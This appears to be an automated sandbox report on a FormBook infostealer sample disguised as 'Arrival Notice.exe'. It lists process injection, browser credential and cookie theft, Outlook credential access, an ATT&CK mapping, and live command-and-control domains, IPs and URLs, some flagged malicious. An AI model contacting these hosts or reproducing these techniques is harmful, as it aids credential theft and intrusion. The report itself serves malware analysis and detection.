            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00411201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00411201
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003F2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_003F2BA5
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041B226 SendInput,keybd_event,0_2_0041B226
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004322DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_004322DA
            Source: C:\Users\user\Desktop\Arrival Notice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"Jump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00410B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00410B62
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00411663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00411663
            Source: Arrival Notice.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Arrival Notice.exe, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135923484.0000000001820000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135923484.0000000001820000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135923484.0000000001820000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D0698 cpuid 0_2_003D0698
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00428195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00428195
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0040D27A GetUserNameW,0_2_0040D27A
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003EBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003EBB6F
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003B42DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Arrival Notice.exeBinary or memory string: WIN_81
            Source: Arrival Notice.exeBinary or memory string: WIN_XP
            Source: Arrival Notice.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Arrival Notice.exeBinary or memory string: WIN_XPe
            Source: Arrival Notice.exeBinary or memory string: WIN_VISTA
            Source: Arrival Notice.exeBinary or memory string: WIN_7
            Source: Arrival Notice.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00431204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00431204
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00431806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00431806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1494709 Sample: Arrival Notice.exe Startdate: 19/08/2024 Architecture: WINDOWS Score: 100 28 www.xn--matfrmn-jxa4m.se 2->28 30 www.xn--fhq1c541j0zr.com 2->30 32 13 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 9 other signatures 2->48 10 Arrival Notice.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 IprrrFQGqOjAyLqOuuogohDyaEetb.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 IprrrFQGqOjAyLqOuuogohDyaEetb.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.anuts.top 23.251.54.212, 61891, 61892, 61893 VPSQUANUS United States 22->34 36 parkingpage.namecheap.com 91.195.240.19, 61903, 61904, 61905 SEDO-ASDE Germany 22->36 38 8 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Arrival Notice.exe37%ReversingLabs
            Arrival Notice.exe27%VirustotalBrowse
            Arrival Notice.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.sandranoll.com11%VirustotalBrowse
            www.dmtxwuatbz.cc2%VirustotalBrowse
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            www.catherineviskadi.com1%VirustotalBrowse
            www.anuts.top7%VirustotalBrowse
            www.telwisey.info2%VirustotalBrowse
            www.hprlz.cz1%VirustotalBrowse
            www.hatercoin.online2%VirustotalBrowse
            www.bfiworkerscomp.com0%VirustotalBrowse
            parkingpage.namecheap.com0%VirustotalBrowse
            www.xn--fhq1c541j0zr.com0%VirustotalBrowse
            www.gipsytroya.com1%VirustotalBrowse
            www.helpers-lion.online0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.anuts.top/li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://dts.gnpge.com0%VirustotalBrowse
            http://www.sandranoll.com/aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=100%Avira URL Cloudmalware
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
            http://www.xn--fhq1c541j0zr.com/rm91/0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/px.js?ch=20%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png0%VirustotalBrowse
            http://www.bfiworkerscomp.com/px.js?ch=10%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L300%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%VirustotalBrowse
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%VirustotalBrowse
            http://www.catherineviskadi.com/qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L300%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking1%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe1%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%VirustotalBrowse
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L300%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%VirustotalBrowse
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw1%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png0%VirustotalBrowse
            http://www.sandranoll.com/aroo/100%Avira URL Cloudmalware
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/100%Avira URL Cloudmalware
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            https://static.loopia.se/shared/style/2022-extra-pages.css0%VirustotalBrowse
            http://www.xn--matfrmn-jxa4m.se/4hda/100%Avira URL Cloudmalware
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png0%VirustotalBrowse
            http://www.telwisey.info/ei85/0%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/7%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=UjNZQ0VuZmNSTGxudFk1ejYxKzNaQ0FiYW43cEtXaFhmSFFT0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-114.png0%VirustotalBrowse
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/2%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.xn--fhq1c541j0zr.com/rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            http://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30100%Avira URL Cloudmalware
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park1%VirustotalBrowse
            http://www.xn--matfrmn-jxa4m.se/4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30100%Avira URL Cloudmalware
            https://static.loopia.se/responsive/styles/reset.css0%VirustotalBrowse
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH0%Avira URL Cloudsafe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc0%Avira URL Cloudsafe
            http://www.anuts.top/li0t/0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%VirustotalBrowse
            http://www.bfiworkerscomp.com/xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=0%Avira URL Cloudsafe
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sandranoll.com
            		213.145.228.16
            		truetrueunknown
            www.dmtxwuatbz.cc
            		104.21.45.56
            		truetrueunknown
            www.xn--matfrmn-jxa4m.se
            		194.9.94.85
            		truetrueunknown
            www.catherineviskadi.com
            		217.160.0.106
            		truetrueunknown
            www.anuts.top
            		23.251.54.212
            		truetrueunknown
            www.bfiworkerscomp.com
            		208.91.197.27
            		truetrueunknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truetrueunknown
            www.telwisey.info
            		199.192.19.19
            		truetrueunknown
            www.hprlz.cz
            		5.44.111.162
            		truetrueunknown
            www.xn--fhq1c541j0zr.com
            		43.252.167.188
            		truetrueunknown
            www.fourgrouw.cfd
            		unknown
            		unknowntrue
              		unknown
              www.hatercoin.online
              		unknown
              		unknowntrueunknown
              www.tinmapco.com
              		unknown
              		unknowntrue
                		unknown
                www.gipsytroya.com
                		unknown
                		unknowntrueunknown
                www.helpers-lion.online
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
